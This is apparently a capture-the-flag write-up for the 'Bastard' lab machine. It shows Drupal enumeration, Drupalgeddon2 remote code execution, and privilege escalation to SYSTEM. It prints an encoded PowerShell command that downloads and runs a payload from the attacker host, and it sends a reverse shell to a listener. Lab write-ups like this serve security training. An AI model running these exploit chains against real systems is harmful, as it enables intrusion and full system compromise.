Bastard

Initial nmap

sudo nmap -sS -sV -p- -T4 -Pn -n –disable-arp-ping -v 10.10.10.9

PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
135/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

HTTP is running Drupal CMS. Version 7 as shown via Wappalyzer plugin and the response headers. IIS Server 7.5.

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=utf-8
Content-Language: en
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.28
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Generator: Drupal 7 (http://drupal.org)
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2021 04:59:01 GMT
Content-Length: 7583

Exploring the CMS a bit finds user enumeration in the Request New Password page.

None-Existing user:

"Sorry, youcannotbehere is not recognized as a user name or an e-mail address."

Existing User(admin):

"Unable to send e-mail. Contact the site administrator if the problem persists."

Doing a searchsploit check on Drupal 7 finds a vulnerability called “Drupalgeddon”:

Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User) | php/webapps/34992.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Session) | php/webapps/44355.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (1) | php/webapps/34984.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (2) | php/webapps/34993.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Execution) | php/webapps/35150.php

Cranking out Metasploit for a quick win I find it confirms the machine is vulnerable but is unable to exploit it.

msf6 exploit(unix/webapp/drupal_drupalgeddon2) > run

[*] Started reverse TCP handler on 10.10.14.12:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Exploit completed, but no session was created.

Typing CVE-2018-7600 into github finds an exploit that gets RCE

https://github.com/pimps/CVE-2018-7600

python3 drupa7-CVE-2018-7600.py http://10.10.10.9 -c whoami

=============================================================================
| DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600) |
| by pimps |
=============================================================================

[*] Poisoning a form and including it in cache.
[*] Poisoned form ID: form-TbrNh5DKlNwJLDRO8jWUsOZAiqbkqxXlSjek3an9kSs
[*] Triggering exploit to execute: whoami
nt authority\iusr

Popping a meterpretter session using the web delivery payload

python3 drupa7-CVE-2018-7600.py http://10.10.10.9 -c "powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJABkAHUAYQBlAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwBpAGYAKABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBQAHIAbwB4AHkAXQA6ADoARwBlAHQARABlAGYAYQB1AGwAdABQAHIAbwB4AHkAKAApAC4AYQBkAGQAcgBlAHMAcwAgAC0AbgBlACAAJABuAHUAbABsACkAewAkAGQAdQBhAGUALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsAJABkAHUAYQBlAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMQAyADoAOAAwADgAMAAvADAAVwBjAFcAeAByAHcATgBCAGYAdABiAC8ARwB4ADEATgBHADUAaAB1AGYANQBiAHYAbAAnACkAKQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMQAyADoAOAAwADgAMAAvADAAVwBjAFcAeAByAHcATgBCAGYAdABiACcAKQApADsA"

[*] 10.10.10.9 web_delivery - Delivering AMSI Bypass (1405 bytes)
[*] 10.10.10.9 web_delivery - Delivering Payload (3514 bytes)
[*] Sending stage (175174 bytes) to 10.10.10.9
[*] Meterpreter session 1 opened (10.10.14.12:4444 -> 10.10.10.9:49973 ) at 2021-10-21 01:13:19 -0400

Checking for easy wins

meterpreter > run post/multi/recon/local_exploit_suggester

[*] 10.10.10.9 - Collecting local exploits for x86/windows...
[*] 10.10.10.9 - 4 exploit checks are being tried...
[+] 10.10.10.9 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.

Exploit did not want to work due to architecture problems.

[-] Exploit aborted due to failure: no-target: Running against via WOW64 is not supported, try using an x64 meterpreter...

Switching to x64 payload did not work either

set payload windows/x64/meterpreter/reverse_tcp
[-] Exploit aborted due to failure: no-target: Running against via WOW64 is not supported, try using an x64 meterpreter...

Migrating to the only x64 process available killed the meterpreter shell.

Running windows exploit suggester finds this machine vulnerable to kernal MS10-059. It can be downloaded from:

https://github.com/SecWiki/windows-kernel-exploits

C:\inetpub\drupal-7.54>.\kernal.exe 10.10.14.12 6666
.\kernal.exe 10.10.14.12 6666
/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Changing registry values...<BR>/Chimichurri/-->Got SYSTEM token...<BR>/Chimichurri/-->Running reverse shell...<BR>/Chimichurri/-->Restoring default registry values...<BR>

listening on [any] 6666 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.9] 49981
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\inetpub\drupal-7.54>whoami
whoami
nt authority\system